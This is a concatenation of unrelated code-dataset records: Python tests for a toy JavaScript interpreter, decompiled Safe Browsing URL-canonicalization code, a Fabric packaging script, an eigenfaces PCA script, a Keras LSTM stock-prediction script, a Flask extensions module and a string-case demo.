encoding: utf-8 -*-\n\nfrom js.bytecode import to_code, ByteCode, \\\n LOAD_CONSTANT_FLOAT, RETURN, JUMP_IF_FALSE, JUMP_ABSOLUTE\nfrom js.interpreter import Frame, interpret, interpret_source\nfrom js.base_objects import W_FloatObject, W_BoolObject\n\n\ndef test_frame():\n bc = ByteCode('', ['x', 'y'], [], [], [])\n frame = Frame(bc)\n assert len(frame.vars) == 2\n assert frame.valuestack_pos == 0\n x, y = object(), object()\n frame.push(x)\n assert frame.valuestack_pos == 1\n res = frame.pop()\n assert res is x\n assert frame.valuestack_pos == 0\n frame.push(x)\n frame.push(y)\n assert frame.valuestack_pos == 2\n res = frame.pop()\n assert res is y\n assert frame.valuestack_pos == 1\n\n\ndef test_load_constant():\n bc = ByteCode(to_code([\n LOAD_CONSTANT_FLOAT, 0,\n RETURN, 0]),\n [], [12.2], [], [])\n frame = interpret(bc)\n assert frame.test_valuestack == [W_FloatObject(12.2)]\n assert frame.vars == []\n\n\ndef test_assignment():\n frame = interpret_source('x = 2.71;')\n assert frame.test_valuestack == []\n assert frame.vars == [W_FloatObject(2.71)]\n\n\ndef test_load_variable():\n frame = interpret_source('''\n x = 2.71;\n y = x;\n ''')\n assert frame.test_valuestack == []\n assert frame.names == ['x', 'y']\n assert frame.vars == [W_FloatObject(2.71), W_FloatObject(2.71)]\n\n\ndef test_dicard_top():\n frame = interpret_source('2.71;')\n assert frame.test_valuestack == []\n assert frame.vars == []\n\n\ndef test_jumps():\n bc = ByteCode(to_code([\n LOAD_CONSTANT_FLOAT, 0,\n JUMP_IF_FALSE, 8,\n LOAD_CONSTANT_FLOAT, 1,\n JUMP_ABSOLUTE, 10,\n LOAD_CONSTANT_FLOAT, 2,\n RETURN, 0]),\n [], [0.0, -1.0, 1.0], [], [])\n frame = interpret(bc)\n assert frame.test_valuestack == [W_FloatObject(1.0)]\n\n bc = ByteCode(to_code([\n LOAD_CONSTANT_FLOAT, 0,\n JUMP_IF_FALSE, 8,\n LOAD_CONSTANT_FLOAT, 1,\n JUMP_ABSOLUTE, 10,\n LOAD_CONSTANT_FLOAT, 2,\n RETURN, 0]),\n [], [1.0, -1.0, 2.0], [], [])\n frame = interpret(bc)\n assert frame.test_valuestack == [W_FloatObject(-1.0)]\n\n\ndef test_if():\n frame = interpret_source('''\n if (0) {\n x = 10;\n }''')\n assert frame.names == ['x']\n assert frame.vars == [None]\n assert frame.test_valuestack == []\n\n frame = interpret_source('''\n if (1) {\n x = 10;\n }''')\n assert frame.names == ['x']\n assert frame.vars == [W_FloatObject(10.0)]\n assert frame.test_valuestack == []\n\n\ndef test_while():\n frame = interpret_source('''\n while (0) {\n x = 10;\n }''')\n assert frame.names == ['x']\n assert frame.vars == [None]\n assert frame.test_valuestack == []\n\n frame = interpret_source('''\n x = 1;\n y = 10;\n while (x) {\n x = 0;\n y = 100;\n }''')\n assert frame.names == ['x', 'y']\n assert frame.vars == [W_FloatObject(0.0), W_FloatObject(100.0)]\n assert frame.test_valuestack == []\n\n\ndef test_binary_add():\n frame = interpret_source('''\n x = 1 + 2.5;\n ''')\n assert frame.names == ['x']\n assert frame.vars == [W_FloatObject(3.5)]\n assert frame.test_valuestack == []\n\n\ndef test_binary_bool():\n for binary_op, check_fn in [\n ('<', lambda x, y: x < y),\n ('==', lambda x, y: x == y),\n ]:\n for x, y in [(1.0, 2.5), (1.0, 1.0), (1.0, 1.1)]:\n frame = interpret_source('''\n x = %s;\n y = %s;\n res = x %s y;\n ''' % (x, y, binary_op))\n assert frame.names == ['x', 'y', 'res']\n assert frame.vars == [\n W_FloatObject(x), W_FloatObject(y),\n W_BoolObject(check_fn(x, y))]\n assert frame.test_valuestack == []\n\n\ndef test_while_loops():\n frame = interpret_source('''\n x = 0;\n while (x < 10) {\n x = x + 1;\n }\n ''')\n assert frame.names == ['x']\n assert frame.vars == [W_FloatObject(10.0)]\n assert frame.test_valuestack == []\n\n\ndef test_print(capfd):\n frame = interpret_source('print(3.78);')\n out, _ = capfd.readouterr()\n assert out == '3.78\\n'\n assert frame.test_valuestack == []\n\n\ndef test_arithmetic_expressions():\n frame = interpret_source('''\n x = 10;\n y = 4 + x * 2;\n z = (x + y) / x + 3;\n foo = y % 5 + y % 1 + y % 2;\n ''')\n x = 10.0\n y = 4 + x * 2\n z = (x + y) / x + 3\n foo = y % 5 + y % 1 + y % 2\n assert frame.names == ['x', 'y', 'z', 'foo']\n assert frame.vars == map(W_FloatObject, [x, y, z, foo])\n assert frame.test_valuestack == []\n\n\ndef test_fn_noop():\n frame = interpret_source('''\n function foo() {};\n foo();\n ''')\n assert frame.names == ['foo']\n assert len(frame.vars) == 1\n assert frame.test_valuestack == []\n\n\ndef test_fn_print(capfd):\n frame = interpret_source('''\n function foo() {\n print(1);\n };\n foo();\n ''')\n out, _ = capfd.readouterr()\n assert out == '1.0\\n'\n assert frame.names == ['foo']\n assert len(frame.vars) == 1\n assert frame.test_valuestack == []\n\n\ndef test_fn_args(capfd):\n frame = interpret_source('''\n function foo(x) {\n print(x);\n };\n foo(10);\n ''')\n out, _ = capfd.readouterr()\n assert out == '10.0\\n'\n assert frame.names == ['foo']\n assert len(frame.vars) == 1\n assert frame.test_valuestack == []\n\n frame = interpret_source('''\n function foo(x, y) {\n print(x + y);\n };\n x = 20;\n foo(10, x);\n ''')\n out, _ = capfd.readouterr()\n assert out == '30.0\\n'\n assert frame.names == ['foo', 'x']\n assert len(frame.vars) == 2\n assert frame.test_valuestack == []\n\n\ndef test_return():\n frame = interpret_source('''\n function const() {\n return 3.14;\n };\n z = const();\n ''')\n assert frame.names == ['const', 'z']\n assert frame.vars[1] == W_FloatObject(3.14)\n\n frame = interpret_source('''\n function two(x) {\n return x * 2;\n };\n z = two(two(11));\n ''')\n assert frame.names == ['two', 'z']\n assert frame.vars[1] == W_FloatObject(44)\n\n\ndef test_scope():\n frame = interpret_source('''\n x = 10;\n function s() {\n return x;\n };\n y = s();\n ''')\n assert frame.names == ['x', 's', 'y']\n assert frame.vars[2] == W_FloatObject(10.0)\n\n frame = interpret_source('''\n g = 30;\n function s() {\n g = 10;\n function inner() {\n return g;\n };\n return inner;\n };\n function scoped() {\n g = 20;\n inner = s();\n return inner();\n };\n\n y = scoped();\n ''')\n assert frame.names == ['g', 's', 'scoped', 'y']\n assert frame.vars[3] == W_FloatObject(10.0)\n\n\ndef test_recursion():\n frame = interpret_source('''\n function fib(x) {\n if (x < 3) {\n return 1;\n } else {\n return fib(x - 1) + fib(x - 2);\n }\n };\n f1 = fib(1);\n f2 = fib(2);\n f3 = fib(3);\n f4 = fib(4);\n f10 = fib(10);\n ''')\n assert frame.names == ['fib', 'f1', 'f2', 'f3', 'f4', 'f10']\n assert frame.vars[1] == W_FloatObject(1.0)\n assert frame.vars[2] == W_FloatObject(1.0)\n assert frame.vars[3] == W_FloatObject(2.0)\n assert frame.vars[4] == W_FloatObject(3.0)\n assert frame.vars[5] == W_FloatObject(55.0)\n","sub_path":"tests/test_interpreter.py","file_name":"test_interpreter.py","file_ext":"py","file_size_in_byte":7300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"141154801","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/googlesafebrowsing/expression.py\n# Compiled at: 2010-12-12 06:18:52\n\"\"\"Helper classes which help converting a url to a list of SB expressions.\"\"\"\nimport array, logging, re, string, urllib, urlparse, util\n\nclass UrlParseError(Exception):\n pass\n\n\ndef GenerateSafeChars():\n \"\"\"\n Return a string containing all 'safe' characters that shouldn't be escaped\n for url encoding. This includes all printable characters except '#%' and\n whitespace characters.\n \"\"\"\n unfiltered_chars = string.digits + string.ascii_letters + string.punctuation\n filtered_list = [ c for c in unfiltered_chars if c not in '%#' ]\n return array.array('c', filtered_list).tostring()\n\n\nclass ExpressionGenerator(object):\n \"\"\"Class does the conversion url -> list of SafeBrowsing expressions.\n\n This class converts a given url into the list of all SafeBrowsing host-suffix,\n path-prefix expressions for that url. These are expressions that are on the\n SafeBrowsing lists.\n \"\"\"\n HEX = re.compile('^0x([a-fA-F0-9]+)$')\n OCT = re.compile('^0([0-7]+)$')\n DEC = re.compile('^(\\\\d+)$')\n IP_WITH_TRAILING_SPACE = re.compile('^(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}) ')\n POSSIBLE_IP = re.compile('^(?i)((?:0x[0-9a-f]+|[0-9\\\\\\\\.])+)$')\n FIND_BAD_OCTAL_REGEXP = re.compile('(^|\\\\.)0\\\\d*[89]')\n HOST_PORT_REGEXP = re.compile('^(?:.*@)?(?P[^:]*)(:(?P\\\\d+))?$')\n SAFE_CHARS = GenerateSafeChars()\n DEFAULT_PORTS = {'http': '80', 'https': '443', 'ftp': '21'}\n\n def __init__(self, url):\n parse_exception = UrlParseError('failed to parse URL \"%s\"' % (url,))\n canonical_url = ExpressionGenerator.CanonicalizeUrl(url)\n if not canonical_url:\n raise parse_exception\n self._host_lists = []\n self._path_exprs = []\n url_split = urlparse.urlsplit(canonical_url)\n canonical_host, canonical_path = url_split[1], url_split[2]\n self._MakeHostLists(canonical_host, parse_exception)\n if url_split[3]:\n self._path_exprs.append(canonical_path + '?' + url_split[3])\n self._path_exprs.append(canonical_path)\n path_parts = canonical_path.rstrip('/').lstrip('/').split('/')[:3]\n if canonical_path.count('/') < 4:\n path_parts.pop()\n while path_parts:\n self._path_exprs.append('/' + ('/').join(path_parts) + '/')\n path_parts.pop()\n\n if canonical_path != '/':\n self._path_exprs.append('/')\n\n @staticmethod\n def CanonicalizeUrl(url):\n \"\"\"Canonicalize the given URL for the SafeBrowsing protocol.\n\n Args:\n url: URL to canonicalize.\n Returns:\n A canonical URL or None if the URL could not be canonicalized.\n \"\"\"\n tmp_pos = url.find('#')\n if tmp_pos >= 0:\n url = url[0:tmp_pos]\n url = url.lstrip().rstrip()\n url = url.replace('\\t', '').replace('\\r', '').replace('\\n', '')\n url = ExpressionGenerator._Escape(url)\n url_split = urlparse.urlsplit(url)\n if not url_split[0]:\n url = 'http://' + url\n url_split = urlparse.urlsplit(url)\n url_scheme = url_split[0].lower()\n if url_scheme not in ExpressionGenerator.DEFAULT_PORTS:\n return None\n else:\n m = ExpressionGenerator.HOST_PORT_REGEXP.match(url_split[1])\n if not m:\n return None\n host, port = m.group('host'), m.group('port')\n canonical_host = ExpressionGenerator.CanonicalizeHost(host)\n if not canonical_host:\n return None\n if port and port != ExpressionGenerator.DEFAULT_PORTS[url_scheme]:\n canonical_host += ':' + port\n canonical_path = ExpressionGenerator.CanonicalizePath(url_split[2])\n canonical_url = url_split[0] + '://' + canonical_host + canonical_path\n if url_split[3] != '' or url.endswith('?'):\n canonical_url += '?' + url_split[3]\n return canonical_url\n\n @staticmethod\n def CanonicalizePath(path):\n \"\"\"Canonicalize the given path.\"\"\"\n if not path:\n return '/'\n if path[0] != '/':\n path = '/' + path\n path = ExpressionGenerator._Escape(path)\n path_components = []\n for path_component in path.split('/'):\n if path_component == '..':\n if len(path_components) > 0:\n path_components.pop()\n elif path_component != '.' and path_component != '':\n path_components.append(path_component)\n\n canonical_path = '/' + ('/').join(path_components)\n if path.endswith('/') and not canonical_path.endswith('/'):\n canonical_path += '/'\n return canonical_path\n\n @staticmethod\n def CanonicalizeHost(host):\n \"\"\"Canonicalize the given host. Returns None in case of an error.\"\"\"\n if not host:\n return None\n else:\n host = ExpressionGenerator._Escape(host.lower())\n ip = ExpressionGenerator.CanonicalizeIp(host)\n if ip:\n host = ip\n else:\n host_split = [ part for part in host.split('.') if part ]\n if len(host_split) < 2:\n return None\n host = ('.').join(host_split)\n return host\n\n @staticmethod\n def CanonicalizeIp(host):\n \"\"\"\n Return a canonicalized IP if host can represent an IP and None otherwise.\n \"\"\"\n if len(host) <= 15:\n m = ExpressionGenerator.IP_WITH_TRAILING_SPACE.match(host)\n if m:\n host = m.group(1)\n if not ExpressionGenerator.POSSIBLE_IP.match(host):\n return\n else:\n allow_octal = not ExpressionGenerator.FIND_BAD_OCTAL_REGEXP.search(host)\n host_split = [ part for part in host.split('.') if part ]\n if len(host_split) > 4:\n return\n ip = []\n for i in xrange(len(host_split)):\n m = ExpressionGenerator.HEX.match(host_split[i])\n if m:\n base = 16\n else:\n m = ExpressionGenerator.OCT.match(host_split[i])\n if m and allow_octal:\n base = 8\n else:\n m = ExpressionGenerator.DEC.match(host_split[i])\n if m:\n base = 10\n else:\n return\n n = long(m.group(1), base)\n if n > 255:\n if i < len(host_split) - 1:\n n &= 255\n ip.append(n)\n else:\n bytes = []\n shift = 0\n while n > 0 and len(bytes) < 4:\n bytes.append(n & 255)\n n >>= 8\n\n if len(ip) + len(bytes) > 4:\n return\n bytes.reverse()\n ip.extend(bytes)\n else:\n ip.append(n)\n\n while len(ip) < 4:\n ip.append(0)\n\n return '%u.%u.%u.%u' % tuple(ip)\n\n def Expressions(self):\n \"\"\"\n A generator of the possible expressions.\n \"\"\"\n for host_parts in self._host_lists:\n host = ('.').join(host_parts)\n for p in self._path_exprs:\n yield Expression(host, p)\n\n @staticmethod\n def _Escape(unescaped_str):\n \"\"\"Fully unescape the given string, then re-escape once.\n\n Args:\n unescaped_str: string that should be escaped.\n Returns:\n Escaped string according to the SafeBrowsing protocol.\n \"\"\"\n unquoted = urllib.unquote(unescaped_str)\n while unquoted != unescaped_str:\n unescaped_str = unquoted\n unquoted = urllib.unquote(unquoted)\n\n return urllib.quote(unquoted, ExpressionGenerator.SAFE_CHARS)\n\n def _MakeHostLists(self, host, parse_exception):\n \"\"\"\n Canonicalize host and build self._host_lists.\n \"\"\"\n ip = ExpressionGenerator.CanonicalizeIp(host)\n if ip is not None:\n self._host_lists.append([ip])\n return\n else:\n host_split = [ part for part in host.split('.') if part ]\n if len(host_split) < 2:\n raise parse_exception\n start = len(host_split) - 5\n stop = len(host_split) - 1\n if start <= 0:\n start = 1\n self._host_lists.append(host_split)\n for i in xrange(start, stop):\n self._host_lists.append(host_split[i:])\n\n return\n\n\nclass Expression(object):\n \"\"\"Class which represents a host-suffix, path-prefix expression.\"\"\"\n\n def __init__(self, host, path):\n self._host = host\n self._path = path\n self._value = host + path\n self._hash_value = util.GetHash256(self._value)\n\n def __str__(self):\n return self.Value()\n\n def __repr__(self):\n \"\"\"\n Not really a good repr. This is for debugging.\n \"\"\"\n return self.Value()\n\n def Value(self):\n return self._value\n\n def HashValue(self):\n return self._hash_value","sub_path":"pycfiles/googlesafebrowsing-0.2.beta.git-py2.6/expression.py","file_name":"expression.py","file_ext":"py","file_size_in_byte":9513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"480423432","text":"#!/usr/bin/python3\nfrom datetime import datetime\nfrom fabric.api import local\n\n\ndef do_pack():\n \"\"\" Compress files fabric \"\"\"\n d = datetime.now()\n file = \"web_static_{}.tgz\".format(str(d.year) + str(\n d.month) + str(d.day) + str(d.hour) + str(d.minute) + str(d.second))\n try:\n local(\"mkdir -p versions\")\n local(\"tar -cvzf versions/{} web_static/\".format(file))\n return \"./()\".format(file)\n except:\n return None\n","sub_path":"1-pack_web_static.py","file_name":"1-pack_web_static.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"497226886","text":"import os\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom scipy.io import loadmat\nfrom sklearn.decomposition import PCA\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.metrics import accuracy_score\n\n\ndef test(data, eigenvectors, mean, train_descriptors, train_labels, test_labels):\n\t\"\"\"\n\tProjects the given faces onto the subspace defined by eigenvectors and classifies them\n\tvia nearest neighbor approach against the given descriptors.\n\n\tArgs:\n\t\tdata: the face data to classify.\n\t\tmean: the mean face of the training data.\n\t\ttrain_descriptors: the descriptors for the training set faces.\n\t\ttrain_labels: the labels for the training data.\n\t\ttest_labels: the labels for the test data.\n\n\tReturns:\n\t\tClassification accuracy, describing how many test faces have been\n\t\tlabeled as the right person.\n\t\"\"\"\n\ttest_descriptors = np.dot(data - mean, eigenvectors.T)\n\n\tnn = NearestNeighbors(n_neighbors=1).fit(train_descriptors)\n\tdistances, indices = nn.kneighbors(test_descriptors)\n\tpredicted_labels = train_labels[indices].flatten()\n\n\treturn accuracy_score(test_labels, predicted_labels)\n\ndef load_data(path):\n\t\"\"\"\n\tLoads the face data from the provided file.\n\n\tArgs:\n\t\tpath: the path to the .mat file.\n\n\tReturns:\n\t\tdata: The image data.\n\t\tlabels: The labels for the images.\n\t\"\"\"\n\tif not os.path.isfile(path):\n\t\traise IOError(\"Argument is not a file\")\n\telse:\n\t\tmat = loadmat(path)\n\t\tdata = mat[\"fea\"]\n\t\tlabels = mat[\"gnd\"]\n\t\treturn data, labels\n\ndef load_spec(path):\n\t\"\"\"\n\tLoads the train/test specification from the provided file.\n\tThis file indicates which images from the dataset are used\n\tfor training and for testing.\n\n\tArgs:\n\t\tpath: the path to the .mat file.\n\n\tReturns:\n\t\tA dictionary containing the specification.\n\t\"\"\"\n\tif not os.path.isfile(path):\n\t\traise IOError(\"Argument is not a file\")\n\telse:\n\t\tmat = loadmat(path)\n\t\treturn mat\n\ndef pca(data, k, use_sklearn=False):\n\t\"\"\"\n\tApplies principal component analysis to the given data, calculating the\n\tfirst k principal components.\n\n\tArgs:\n\t\tdata: the data to calculate the principal components for\n\t\t(in the format observation x feature vector).\n\t\tk: the number of principal components to calculate.\n\t\tuse_sklearn: a flag to indicate whether sklearn should be used to do\n\t\tthe PCA (for comparison with the own implementation)\n\n\tReturns:\n\t\tdescriptors: the projection of the data onto the new subspace.\n\t\teigenvectors: the eigenvectors corresponding to the k highest eigenvalues.\n\t\tmean: the mean of the data.\n\t\"\"\"\n\tmean = np.mean(data, axis=0)\n\tX = data - mean\n\n\tif use_sklearn:\n\t\tpca = PCA(n_components=k)\n\t\tpca.fit(X)\n\t\teigenvectors = pca.components_\n\t\tdescriptors = pca.transform(X)\n\telse:\n\t\t[n, d] = X.shape\n\t\t\n\t\tif n > d:\n\t\t\tC = np.dot(X.T, X)\n\t\t\t[eigenvalues, eigenvectors] = np.linalg.eigh(C)\n\t\telse:\n\t\t\tC = np.dot(X, X.T)\n\t\t\t[eigenvalues, eigenvectors] = np.linalg.eigh(C)\n\t\t\teigenvectors = np.dot(X.T, eigenvectors).T\n\t\t\tfor i in range(n):\n\t\t\t\t# normalize\n\t\t\t\teigenvectors[i] = eigenvectors[i]/np.linalg.norm(eigenvectors[i])\n\n\t\tidx = np.argsort(-eigenvalues)\n\t\teigenvalues = eigenvalues[idx]\n\t\teigenvectors = eigenvectors[idx]\n\n\t\t# keep only k\n\t\teigenvalues = eigenvalues[:k]\n\t\teigenvectors = eigenvectors[:k]\n\n\t\tdescriptors = np.dot(X, eigenvectors.T)\n\n\treturn descriptors, eigenvectors, mean\n\ndef reconstruct(mean, eigenvectors, descriptor):\n\t\"\"\"\n\tReconstructs the image of a face from the mean face, the eigenvectors\n\tand the image's descriptors.\n\n\tArgs:\n\t\tmean: the mean face.\n\t\teigenvectors: the eigenvectors of the face subspace.\n\t\tdescriptor: the target face's descriptor.\n\n\tReturns:\n\t\tThe reconstructed face image as a row vector.\n\t\"\"\"\n\treturn mean + np.dot(eigenvectors.T, descriptor)\n\ndef plot_reconstruction(mean, eigenvectors, descriptor, rows, columns):\n\t\"\"\"\n\tPlots the reconstruction of a face with varying numbers of eigenfaces.\n\n\tArgs:\n\t\tmean: the mean face.\n\t\teigenvectors: the eigenvectors of the face subspace.\n\t\tdescriptor: the target face's descriptor.\n\t\trows: number of rows in the plot.\n\t\tcolumns: number of columns in the plot.\n\t\"\"\"\n\treconstructions = []\n\ttitles = []\n\n\tfor i in range(10, min(len(eigenvectors), 320), 20):\n\t reconstructions.append(reconstruct(mean, eigenvectors[:i], descriptor[:i]).reshape(32, 32))\n\t titles.append(\"{} eigenfaces\".format(i))\n\n\tplot_faces(reconstructions, rows, columns, titles)\n\n\ndef plot_faces(faces, rows, columns, sptitle=None):\n\t\"\"\"\n\tPlots the given image data in rows x columns subplots.\n\n\tArgs:\n\t\tfaces: the face data.\n\t\trows: number of rows in the plot.\n\t\tcolumns: number of columns in the plot.\n\t\tsptitle: titles for the subplots.\n\t\"\"\"\n\tfig = plt.figure()\n\t\n\tfor i, face in enumerate(faces):\n\t\tax = fig.add_subplot(rows, columns, i+1)\n\t\tax.axis(\"off\")\n\t\tax.imshow(np.rot90(face, k=3), cmap=cm.gray)\n\n\t\tif sptitle != None:\n\t\t\tif len(sptitle) == len(faces):\n\t\t\t\tplt.title(sptitle[i], fontname=\"Tahoma\", fontsize=10)\n\t\t\telse:\n\t\t\t\tplt.title(\"{} #{}\".format(sptitle, i), fontname=\"Tahoma\", fontsize=10)\n\tfig.show()\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument(\"--datafile\", default=\"faces/ORL_32x32.mat\", help=\"file with face data\")\n\tparser.add_argument(\"--specfile\", default=\"faces/5Train/5.mat\", help=\"matrix specifying which images to use for training and testing\")\n\tparser.add_argument(\"--k\", help=\"number of principal components to use\", type=int, default=None)\n\tparser.add_argument(\"--use_sklearn\", help=\"\", action=\"store_true\")\n\targs = parser.parse_args()\n\n\tdata, labels = load_data(args.datafile)\n\n\t# Normalize data\n\tdata = np.array(data/255.0)\n\n\tspec = load_spec(args.specfile)\n\n\t# Need to subtract 1 from the indices, because matrices\n\t# have originally been created in MATLAB and\n\t# MATLAB indexing starts at 1 as opposed to 0\n\ttrain_data = data[spec[\"trainIdx\"].flatten()-1]\n\ttrain_labels = labels[spec[\"trainIdx\"].flatten()-1].flatten()\n\ttest_data = data[spec[\"testIdx\"].flatten()-1]\n\ttest_labels = labels[spec[\"testIdx\"].flatten()-1].flatten()\n\n\tif args.k != None:\n\t\tif args.k > len(train_data):\n\t\t\tprint(\"Warning: specified more principal components than there are images in the training set. \" +\n\t\t\t\t\"Using {} principal components instead.\".format(len(train_data)))\n\t\t\targs.k = len(train_data)\n\n\t\ttrain_descriptors, eigenvectors, mean = pca(train_data, args.k, args.use_sklearn)\n\t\teigenfaces = eigenvectors.reshape(args.k, 32, 32)\n\t\t\n\t\tscore = test(test_data, eigenvectors, mean, train_descriptors, train_labels, test_labels)\n\t\tprint(\"Accuracy: {}\".format(score))\n\telse:\n\t\t# If no k is specified, calculate accuracies for all possible values of k and\n\t\t# return scores array to global scope\n\t\tscores = []\n\t\tfor k in range(1, len(train_data)+1):\n\t\t\ttrain_descriptors, eigenvectors, mean = pca(train_data, k, args.use_sklearn)\n\t\t\teigenfaces = eigenvectors.reshape(k, 32, 32)\n\t\t\t\n\t\t\tscore = test(test_data, eigenvectors, mean, train_descriptors, train_labels, test_labels)\n\t\t\tscores.append(score)\n","sub_path":"eigenfaces/eigenface.py","file_name":"eigenface.py","file_ext":"py","file_size_in_byte":6992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"95169352","text":"import pandas as pd\nimport numpy as np\n\nfrom random import randint\nfrom keras.layers import TimeDistributed, Activation\nfrom numpy.random import choice\nfrom keras import metrics\nimport tensorflow as tf\nimport keras\nfrom keras import backend as K\nfrom keras.utils.data_utils import get_file\nfrom keras.utils import np_utils\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import Sequential, Model\nfrom keras.layers import Input, Embedding, Reshape, merge, LSTM, Bidirectional\nfrom keras.layers import TimeDistributed, Activation, SimpleRNN, GRU\nfrom keras.layers.core import Flatten, Dense, Dropout, Lambda\n#from keras.regularizers import l2, activity_l2, l1, activity_l1\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.optimizers import SGD, RMSprop, Adam\n#from keras.utils.layer_utils import layer_from_config\nfrom keras.metrics import categorical_crossentropy, categorical_accuracy\nfrom keras.layers.convolutional import *\nfrom keras.preprocessing import image, sequence\nfrom keras.preprocessing.text import Tokenizer\n\ndef get_data(sheetname):\n f = pd.read_excel(open('Base.xlsx','rb'), sheetname=sheetname)\n f[\"Date\"] = pd.to_datetime(f[\"Date\"], format='%d/%m/%Y')\n# tmp = (np.array(f[\"SPX Index\"][20:])/np.array(f[\"SPX Index\"][:-20])-1)*100\n# f[\"20days\"] = np.concatenate((tmp,np.zeros(20)))\n# f[\"20days\"][f[\"20days\"]<-9] = -9\n# f[\"20days\"][f[\"20days\"]>11] = 11\n# f[\"SPX Index\"][1:] = variation_change(f[\"SPX Index\"])\n# f[\"VIX Index\"] = f[\"VIX Index\"].round(0)\n# f[\"ES1 Index\"][1:] = variation_change(f[\"ES1 Index\"])\n# f[\"ES1 Volume\"][1:] = variation_change(f[\"ES1 Volume\"])\n# f = f[1:]\n f = f.set_index('Date')\n return f.round(3)\n\ndef variation_change(df):\n return (np.array(df[1:])/np.array(df[:-1])-1)*100\n\n\ndef onehot(x, time_step, vocab_size): \n b = np.zeros((len(x),len(x[1]), vocab_size))\n for i in range(len(x)) :\n b[i] = onehotint(x[i],len(x[1]),vocab_size)\n return(np.array(b))\n\ndef onehotint(x, length, vocab_size):\n c = np.zeros((length, vocab_size))\n c[np.arange(length), x] = 1 \n return c\n\ndef inverse_onehotint(x, vocab_size):\n return (np.matmul(x,np.arange(vocab_size))-50)\n\n\ndef build_pnl_sentences(x, stock, time_step, length, vocab_size):\n# char_indices, indices_char, idx = build_dictionary(x)\n sentences = []\n next_chars = []\n for i in range(0, length):\n sentences.append(pnl(x[stock][i: i + time_step].values)+50)\n next_chars.append((pnl(x[stock][i: i+time_step+20].values)+50)[20: time_step+20])\n print('nb sequences:', len(sentences))\n sentences = onehot(sentences,time_step,vocab_size)\n next_chars = onehot(next_chars,time_step,vocab_size)\n\n return sentences, next_chars\n\ndef build_complete_sentences(x, stock, time_step, length, vocab_size):\n# char_indices, indices_char, idx = build_dictionary(x)\n sentences = []\n\n for i in range(0, length):\n sentences.append(pnl(x[stock][i: i + time_step].values)+50)\n\n print('nb sequences:', len(sentences))\n sentences = onehot(sentences,time_step,vocab_size)\n\n return sentences\n\ndef pnl(x):\n# return ((x/x[0])*100-100).astype(int)\n return ((x/x[0]-1)*100).astype(int)\n\ndef augment_size_of_sample(sentences):\n z = np.zeros((sentences.shape))\n for x in range(len(sentences)):\n for y in range(len(sentences[0])):\n z[x,y] = np.roll(sentences[x,y],randint(a=-1,b=1))\n\n return z\n\ndef Build_Model(stock, shape):\n \n model2=Sequential([\n # Conv1D(10, input_shape=(10,60), return_sequences=True, dropout_U=0.2, dropout_W=0.2,\n # consume_less='gpu'),\n # Dropout(0.2),\n LSTM(90,input_shape=shape, return_sequences=True, dropout_U=0.2, dropout_W=0.2,\n consume_less='gpu'),\n Dropout(0.2),\n LSTM(90, return_sequences=True, dropout_U=0.2, dropout_W=0.2,\n consume_less='gpu'),\n Dropout(0.2),\n LSTM(90, return_sequences=True, dropout_U=0.2, dropout_W=0.2,\n consume_less='gpu'),\n Dropout(0.2),\n TimeDistributed(Dense(shape[-1], activation='softmax' ) ),\n ])\n\n model2.compile(loss='categorical_crossentropy', optimizer=Adam(), \n metrics=[metrics.mae, metrics.categorical_accuracy])\n model2.summary()\n \n return model2\n\ndef Train_Model(stock, model2, x, y):\n for i in range(5):\n model2.fit(augment_size_of_sample(x), \n y,\n batch_size=64,\n epochs=4,\n shuffle=True,\n validation_split=0.2)\n model2.save_weights('char_lstm_hope_advance_'+stock+'.h5')\n return model2\n\ndef export_excel(stock, model2, df, sentences_pnl, STARTING_POINT, n ):\n rows=[]\n columns_name = [\"Date\",\"Price\",\"Prediction_price_in_20_days\",\"Reel_price_in_20_days\"]\n for i0 in range(n):\n row = []\n X_val = sentences_pnl[STARTING_POINT+i0:STARTING_POINT+i0+1]\n run = model2.predict( X_val)[0][-1]\n row+=[df[stock].index[STARTING_POINT+i0+59]]\n row+=[df[stock][STARTING_POINT+i0+59]]\n row+=[(np.argmax(run)-50+100)*df[stock][STARTING_POINT+i0]/100]\n if (STARTING_POINT+i0+79)>df.shape[0]-1:\n row+=[\"???\"]\n else :\n row+=[df[stock][STARTING_POINT+i0+79]]\n rows+=[row]\n dg = pd.DataFrame(columns=columns_name, data=rows)\n writer = pd.ExcelWriter('output_'+stock+'.xlsx')\n dg.to_excel(writer,stock)\n writer.save()\n return(\"Done\")","sub_path":"123/THEAM_DEEP_LEARNING.py","file_name":"THEAM_DEEP_LEARNING.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"636335465","text":"from flask_debugtoolbar import DebugToolbarExtension\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\n\ndebug_toolbar = DebugToolbarExtension()\ndb = SQLAlchemy()\nlogin_manager = LoginManager()\n\n\ndef init_app(app):\n debug_toolbar.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n","sub_path":"openpot/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"582158533","text":" # UPPER AND LOWER MATHOD\n\nname = 'hello world'\n\nname = name.upper() # this is used to upper case all the letter in the variable\n\nprint(name)\n\nname1 = 'NONE'\n\nname1 = name1.lower() # this will lower case all the characters in variable\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"manipulating 